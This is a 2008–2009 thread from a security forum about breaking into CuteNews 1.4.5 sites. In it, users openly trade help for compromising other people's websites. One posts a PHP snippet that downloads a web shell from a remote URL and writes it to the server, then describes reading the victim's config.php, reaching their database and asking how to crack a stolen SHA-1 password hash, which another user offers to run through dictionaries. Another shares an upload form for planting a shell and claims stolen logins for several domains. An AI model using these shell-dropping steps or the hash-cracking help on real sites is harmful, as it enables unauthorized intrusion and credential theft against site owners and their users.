Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 181
Members: 0
Total: 181
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> Cutenews 1.4.5 Goto page Previous1, 2
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Tue Aug 19, 2008 4:58 pm Reply with quote
xxxmystikxxx
Regular user
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe




i find this in google
$file = file_get_contents('url to yor shell');
$brd = fopen('file2.php','w+');
$write = fwrite($brd, $file);
i insert it and see his config.php then connet to his database.
And now a question: How to decode accounts passwords?
View user's profile Send private message
PostPosted: Wed Aug 20, 2008 2:45 pm Reply with quote
xxxmystikxxx
Regular user
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe




for example how to decode this RDkMcWDQld3vxLdlVnsHLGRhJ5Y=
View user's profile Send private message
PostPosted: Wed Aug 20, 2008 9:17 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




http://makcoder.sourceforge.net/demo/base64.php Smile
View user's profile Send private message
PostPosted: Thu Aug 21, 2008 6:24 am Reply with quote
xxxmystikxxx
Regular user
Regular user
Joined: Aug 17, 2008
Posts: 8
Location: C:/Lineage2/system/l2.exe




lenny wrote:
http://makcoder.sourceforge.net/demo/base64.php Smile

idoesnt decode this because it is base64 decoder but i need SHA-1(base64)
View user's profile Send private message
PostPosted: Fri Aug 22, 2008 1:42 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




oh ok, well in that case you need to submit it in the hash cracking forum. I will run it through my dictionaries now though Smile
View user's profile Send private message
PostPosted: Sat Aug 30, 2008 3:56 am Reply with quote
Romi
Beginner
Beginner
Joined: Apr 06, 2008
Posts: 3




xxxmystikxxx wrote:
i find this in google
$file = file_get_contents('url to yor shell');
$brd = fopen('file2.php','w+');
$write = fwrite($brd, $file);


Hey, m8!
Can you explain me pls, how can i insert this code in template?
I have try upload form but is not work...
this is the form code:
Code:

<form enctype="multipart/form-data" method=POST >
<input type=hidden name=MAX_FILE_SIZE value=1024000>Send this file:
<input name=userfile type=file>
<input type=submit value="Send File"></form>
<?php if(!empty($_FILES[userfile][tmp_name])){
if(move_uploaded_file($_FILES[userfile][tmp_name],"data/upimages/".$_FILES[userfile][name])){
echo "<br> <br> fFile Uploaded ";}}
?>

but dosn't work ,can anyone help me?

P.S.
I have try simple code = phpinfo(); in template
not work too, some sugestion?
View user's profile Send private message
PostPosted: Sat Aug 30, 2008 5:12 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Read whole thread. Laughing
View user's profile Send private message
PostPosted: Sat Aug 30, 2008 10:13 pm Reply with quote
Romi
Beginner
Beginner
Joined: Apr 06, 2008
Posts: 3




koko wrote:
Read whole thread. Laughing


OK. m8, i have read all thread about cutenews 1.4.5 and i can't find nothing...

I have try all solution, nothing...
Have more 8 domain account and passw.., but i cant insert shell...

i have try in more domain, and nothing....
PHP code is not work in template...
Some domain are patched from "Napas", may be this patch is not vulnerable to shell?

I have try with immage too = nothing...

Give me an idea man, if you can....
Thx in advance.....
View user's profile Send private message
PostPosted: Thu Jun 04, 2009 10:10 pm Reply with quote
JasonB
Regular user
Regular user
Joined: Apr 05, 2009
Posts: 23




Hmm, I followed the advice here but it doesn't seem to work.

I get a parsing error if I try to put php into the template, I can get phpinfo to display but I'm lost for what to do now..
View user's profile Send private message
PostPosted: Sat Sep 12, 2009 4:59 am Reply with quote
bizzumbottom
Active user
Active user
Joined: Sep 09, 2009
Posts: 27




So I have access, but .tpl templates can't execute php code.

So the other two choices are to inject code via creating a new user, or changing config.php

Either way, how would I do so properly? I already crashed the last CuteNews site I got into.
View user's profile Send private message
Cutenews 1.4.5
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 2 of 2
Goto page Previous1, 2
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.310 Seconds